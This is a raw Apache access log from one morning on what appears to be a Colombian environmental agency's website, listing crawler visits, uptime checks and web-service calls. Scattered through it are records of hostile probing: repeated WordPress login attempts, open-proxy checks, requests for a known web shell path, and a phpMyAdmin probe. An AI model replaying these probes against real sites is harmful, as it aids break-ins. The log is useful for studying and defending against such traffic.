66.249.73.127 - - [06/Nov/2022:04:21:34 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:04:22:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
93.158.161.48 - - [06/Nov/2022:04:22:28 -0500] "-" 408 -
172.22.2.4 - - [06/Nov/2022:04:21:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:04:22:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
185.119.81.101 - - [06/Nov/2022:04:24:28 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [06/Nov/2022:04:24:29 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
216.245.221.92 - - [06/Nov/2022:04:24:58 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Nov/2022:04:27:11 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:04:27:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
185.119.81.97 - - [06/Nov/2022:04:27:48 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [06/Nov/2022:04:27:49 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [06/Nov/2022:04:27:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Nov/2022:04:29:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:04:28:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [06/Nov/2022:04:31:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43085
201.245.192.253 - - [06/Nov/2022:04:31:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44000
40.77.167.46 - - [06/Nov/2022:04:31:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5030.pdf HTTP/1.1" 304 -
201.245.192.253 - - [06/Nov/2022:04:32:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
77.88.5.83 - - [06/Nov/2022:04:32:28 -0500] "-" 408 -
66.249.73.127 - - [06/Nov/2022:04:33:24 -0500] "-" 408 -
172.22.2.4 - - [06/Nov/2022:04:34:22 -0500] "GET /BLA/boletinlegal/xmlrpc.php HTTP/1.1" 404 1038
216.245.221.92 - - [06/Nov/2022:04:34:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:04:33:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
100.26.112.185 - - [06/Nov/2022:04:35:38 -0500] "GET http://azenv.net/ HTTP/1.1" 200 319
185.119.81.103 - - [06/Nov/2022:04:35:43 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [06/Nov/2022:04:35:44 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Nov/2022:04:34:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
201.245.192.253 - - [06/Nov/2022:04:37:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [06/Nov/2022:04:39:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:04:39:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Nov/2022:04:41:10 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:04:41:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43085
201.245.192.253 - - [06/Nov/2022:04:41:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44000
172.22.2.4 - - [06/Nov/2022:04:40:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55630
201.245.192.253 - - [06/Nov/2022:04:42:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
77.88.5.3 - - [06/Nov/2022:04:42:36 -0500] "-" 408 -
216.245.221.92 - - [06/Nov/2022:04:44:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:04:45:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Nov/2022:04:47:14 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:04:47:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:04:46:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [06/Nov/2022:04:49:58 -0500] "HEAD / HTTP/1.1" 200 -
193.118.53.194 - - [06/Nov/2022:04:51:53 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.245.192.253 - - [06/Nov/2022:04:52:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:04:50:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Nov/2022:04:53:21 -0500] "-" 408 -
172.22.2.4 - - [06/Nov/2022:04:51:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
40.122.227.200 - - [06/Nov/2022:04:54:07 -0500] "GET /portaldeninos/wp-content/uploads/2022/03/Mapa-humedales-2022.jpg HTTP/1.1" 200 894674
216.245.221.92 - - [06/Nov/2022:04:54:58 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.3 - - [06/Nov/2022:04:56:42 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12504
201.245.192.253 - - [06/Nov/2022:04:57:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:04:56:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:04:57:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
66.249.73.127 - - [06/Nov/2022:04:59:23 -0500] "-" 408 -
40.77.167.69 - - [06/Nov/2022:04:59:29 -0500] "GET /portaldeninos/2021/06/16/en-el-festival-de-la-colombiodiversidad-se-resalto-la-importancia-de-las-aves-bogotanas/ HTTP/1.1" 200 106902
40.77.167.46 - - [06/Nov/2022:04:59:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
40.77.167.46 - - [06/Nov/2022:04:59:45 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
40.77.167.46 - - [06/Nov/2022:04:59:45 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
40.77.167.46 - - [06/Nov/2022:04:59:46 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
40.77.167.69 - - [06/Nov/2022:04:59:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
40.77.167.69 - - [06/Nov/2022:04:59:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
40.77.167.69 - - [06/Nov/2022:04:59:51 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
157.55.39.15 - - [06/Nov/2022:04:59:53 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
40.77.167.33 - - [06/Nov/2022:04:59:54 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
40.77.167.33 - - [06/Nov/2022:04:59:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
40.77.167.33 - - [06/Nov/2022:04:59:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
40.77.167.41 - - [06/Nov/2022:04:59:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
40.77.167.33 - - [06/Nov/2022:04:59:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
40.77.167.33 - - [06/Nov/2022:04:59:55 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
216.245.221.92 - - [06/Nov/2022:04:59:58 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.131 - - [06/Nov/2022:05:00:00 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
207.46.13.131 - - [06/Nov/2022:05:00:01 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
207.46.13.131 - - [06/Nov/2022:05:00:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
207.46.13.131 - - [06/Nov/2022:05:00:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
207.46.13.131 - - [06/Nov/2022:05:00:01 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
207.46.13.131 - - [06/Nov/2022:05:00:02 -0500] "GET /portaldeninos/wp-includes/js/comment-reply.min.js?ver=4.9.8 HTTP/1.1" 200 1078
207.46.13.131 - - [06/Nov/2022:05:00:02 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
157.55.39.15 - - [06/Nov/2022:05:00:07 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
157.55.39.15 - - [06/Nov/2022:05:00:08 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
157.55.39.15 - - [06/Nov/2022:05:00:08 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
40.77.167.41 - - [06/Nov/2022:05:00:15 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
40.77.167.41 - - [06/Nov/2022:05:00:15 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
40.77.167.57 - - [06/Nov/2022:05:00:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/1270.tif HTTP/1.1" 200 28932
40.77.167.46 - - [06/Nov/2022:05:02:18 -0500] "GET /BLA/resoluciones/AUTOS%202022/2193.pdf HTTP/1.1" 304 -
201.245.192.253 - - [06/Nov/2022:05:02:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:05:02:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Nov/2022:05:04:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:05:03:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
172.22.2.4 - - [06/Nov/2022:05:07:01 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
201.245.192.253 - - [06/Nov/2022:05:07:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
66.249.73.127 - - [06/Nov/2022:05:07:52 -0500] "-" 408 -
216.245.221.92 - - [06/Nov/2022:05:09:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:05:08:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.46 - - [06/Nov/2022:05:10:28 -0500] "GET / HTTP/1.1" 200 4720
185.119.81.101 - - [06/Nov/2022:05:10:33 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [06/Nov/2022:05:10:34 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [06/Nov/2022:05:09:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [06/Nov/2022:05:12:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
69.63.184.118 - - [06/Nov/2022:05:12:32 -0500] "GET /images/Reciclaton%20Nov%202022%20(1)%20(1).jpeg HTTP/1.1" 200 53811
185.119.81.100 - - [06/Nov/2022:05:14:19 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Nov/2022:05:14:20 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
66.249.73.127 - - [06/Nov/2022:05:14:35 -0500] "-" 408 -
216.245.221.92 - - [06/Nov/2022:05:14:58 -0500] "HEAD / HTTP/1.1" 200 -
40.77.188.153 - - [06/Nov/2022:05:15:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
172.22.2.4 - - [06/Nov/2022:05:14:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:05:15:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [06/Nov/2022:05:17:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [06/Nov/2022:05:19:58 -0500] "HEAD / HTTP/1.1" 200 -
205.210.31.8 - - [06/Nov/2022:05:20:09 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [06/Nov/2022:05:21:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43079
201.245.192.253 - - [06/Nov/2022:05:21:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43984
172.22.2.4 - - [06/Nov/2022:05:20:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:05:22:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:05:21:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
192.241.202.21 - - [06/Nov/2022:05:23:11 -0500] "MGLNDD_190.27.245.106_80" 501 953
40.77.167.57 - - [06/Nov/2022:05:23:53 -0500] "GET /galeria/galeria/fotos/Humedal-la-Isla1G.jpg HTTP/1.1" 200 216243
216.245.221.92 - - [06/Nov/2022:05:24:58 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:05:27:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:05:25:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:05:26:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [06/Nov/2022:05:29:58 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:05:31:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43079
201.245.192.253 - - [06/Nov/2022:05:31:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43984
201.245.192.253 - - [06/Nov/2022:05:32:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:05:31:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
89.47.171.147 - - [06/Nov/2022:05:33:40 -0500] "GET /phpmyadmin/ HTTP/1.1" 403 1165
172.22.2.4 - - [06/Nov/2022:05:32:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [06/Nov/2022:05:34:58 -0500] "HEAD / HTTP/1.1" 200 -
20.106.27.209 - - [06/Nov/2022:05:36:26 -0500] "GET /galeria/galeria/fotos/loro3P.jpg HTTP/1.1" 200 24900
201.245.192.253 - - [06/Nov/2022:05:37:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
199.16.157.183 - - [06/Nov/2022:05:38:05 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
172.22.2.4 - - [06/Nov/2022:05:37:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Nov/2022:05:39:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:05:38:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [06/Nov/2022:05:41:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43079
201.245.192.253 - - [06/Nov/2022:05:41:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43984
201.245.192.253 - - [06/Nov/2022:05:42:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:05:43:19 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [06/Nov/2022:05:43:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
40.77.167.57 - - [06/Nov/2022:05:44:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201-50/00000037.tif HTTP/1.1" 200 207676
216.245.221.92 - - [06/Nov/2022:05:44:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:05:43:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:05:44:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
40.122.195.128 - - [06/Nov/2022:05:46:42 -0500] "GET /galeria/galeria/fotos/2CaminataP6.jpg HTTP/1.1" 200 27065
201.245.192.253 - - [06/Nov/2022:05:47:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
40.77.167.46 - - [06/Nov/2022:05:48:10 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12504
216.245.221.92 - - [06/Nov/2022:05:49:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:05:49:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:05:50:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
201.245.192.253 - - [06/Nov/2022:05:52:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [06/Nov/2022:05:54:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:05:55:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:05:57:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:05:55:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
186.84.88.86 - - [06/Nov/2022:05:59:15 -0500] "GET / HTTP/1.1" 200 4720
186.84.88.86 - - [06/Nov/2022:05:59:15 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
186.84.88.86 - - [06/Nov/2022:05:59:15 -0500] "GET /js/url.js HTTP/1.1" 404 1294
186.84.88.86 - - [06/Nov/2022:05:59:15 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
186.84.88.86 - - [06/Nov/2022:05:59:15 -0500] "GET /css/style.css HTTP/1.1" 200 3473
186.84.88.86 - - [06/Nov/2022:05:59:21 -0500] "GET /favicon.ico HTTP/1.1" 404 1294
216.245.221.92 - - [06/Nov/2022:05:59:58 -0500] "HEAD / HTTP/1.1" 200 -
173.252.79.120 - - [06/Nov/2022:06:01:51 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
201.245.192.253 - - [06/Nov/2022:06:02:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:06:00:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:01:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
40.77.167.3 - - [06/Nov/2022:06:04:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20400-449.TIF HTTP/1.1" 200 9262392
216.245.221.92 - - [06/Nov/2022:06:04:58 -0500] "HEAD / HTTP/1.1" 200 -
40.86.101.254 - - [06/Nov/2022:06:05:36 -0500] "GET /galeria/nivo-slider/demo/images/web%20ingreso%20humedales.png HTTP/1.1" 200 641193
201.245.192.253 - - [06/Nov/2022:06:07:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
35.77.44.185 - - [06/Nov/2022:06:07:37 -0500] "GET http://azenv.net/ HTTP/1.1" 200 319
185.119.81.103 - - [06/Nov/2022:06:07:45 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [06/Nov/2022:06:07:46 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
13.67.224.14 - - [06/Nov/2022:06:07:46 -0500] "GET /portaldeninos/wp-content/uploads/2021/05/corresponsal-ambiental-10-mayo.jpg HTTP/1.1" 200 87975
172.22.2.4 - - [06/Nov/2022:06:06:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:07:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [06/Nov/2022:06:09:58 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.46 - - [06/Nov/2022:06:10:54 -0500] "GET /BLA/resoluciones/AUTOS%202022/2193.pdf HTTP/1.1" 304 -
201.245.192.253 - - [06/Nov/2022:06:12:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
157.55.39.190 - - [06/Nov/2022:06:12:28 -0500] "GET /galeria/galeria/fotos/Humedal-vaca6G.jpg HTTP/1.1" 200 176858
172.22.2.4 - - [06/Nov/2022:06:12:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Nov/2022:06:14:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:13:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
94.102.61.10 - - [06/Nov/2022:06:16:10 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [06/Nov/2022:06:17:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
185.119.81.103 - - [06/Nov/2022:06:17:13 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [06/Nov/2022:06:17:14 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
74.208.251.190 - - [06/Nov/2022:06:18:15 -0500] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 1018
74.208.251.190 - - [06/Nov/2022:06:18:15 -0500] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 1034
172.22.2.4 - - [06/Nov/2022:06:18:16 -0500] "GET /BLA/boletinlegal/wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 1038
74.208.251.190 - - [06/Nov/2022:06:18:15 -0500] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 1035
66.249.73.97 - - [06/Nov/2022:06:18:33 -0500] "-" 408 -
216.245.221.92 - - [06/Nov/2022:06:19:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:18:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:19:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [06/Nov/2022:06:21:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42945
201.245.192.253 - - [06/Nov/2022:06:21:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44011
201.245.192.253 - - [06/Nov/2022:06:22:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [06/Nov/2022:06:24:58 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Nov/2022:06:24:59 -0500] "-" 408 -
172.22.2.4 - - [06/Nov/2022:06:24:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:25:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
157.230.214.137 - - [06/Nov/2022:06:27:00 -0500] "\x16\x03\x01" 400 226
157.230.214.137 - - [06/Nov/2022:06:27:00 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [06/Nov/2022:06:27:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
185.119.81.103 - - [06/Nov/2022:06:27:12 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [06/Nov/2022:06:27:13 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [06/Nov/2022:06:29:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:31:00 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 200 25011
201.245.192.253 - - [06/Nov/2022:06:31:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42945
201.245.192.253 - - [06/Nov/2022:06:31:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44011
172.22.2.4 - - [06/Nov/2022:06:30:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:06:32:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:06:30:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
183.136.225.32 - - [06/Nov/2022:06:33:07 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [06/Nov/2022:06:34:58 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.100 - - [06/Nov/2022:06:36:03 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Nov/2022:06:36:04 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
20.106.28.16 - - [06/Nov/2022:06:36:47 -0500] "GET /galeria/nivo-slider/demo/images/bannerbioseguridad.jpg HTTP/1.1" 200 228661
201.245.192.253 - - [06/Nov/2022:06:36:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:06:35:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:36:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
23.100.232.233 - - [06/Nov/2022:06:38:41 -0500] "GET /bla/resoluciones/resoluciones%202021/2620.pdf HTTP/1.1" 200 435687
216.245.221.92 - - [06/Nov/2022:06:39:58 -0500] "HEAD / HTTP/1.1" 200 -
20.106.28.18 - - [06/Nov/2022:06:40:40 -0500] "GET /galeria/nivo-slider/demo/images/Trafico%20de%20fauna.jpg HTTP/1.1" 200 198327
201.245.192.253 - - [06/Nov/2022:06:41:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42945
201.245.192.253 - - [06/Nov/2022:06:41:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44011
201.245.192.253 - - [06/Nov/2022:06:41:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:06:41:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:06:42:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
216.245.221.92 - - [06/Nov/2022:06:44:58 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.101 - - [06/Nov/2022:06:45:39 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [06/Nov/2022:06:45:40 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [06/Nov/2022:06:46:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
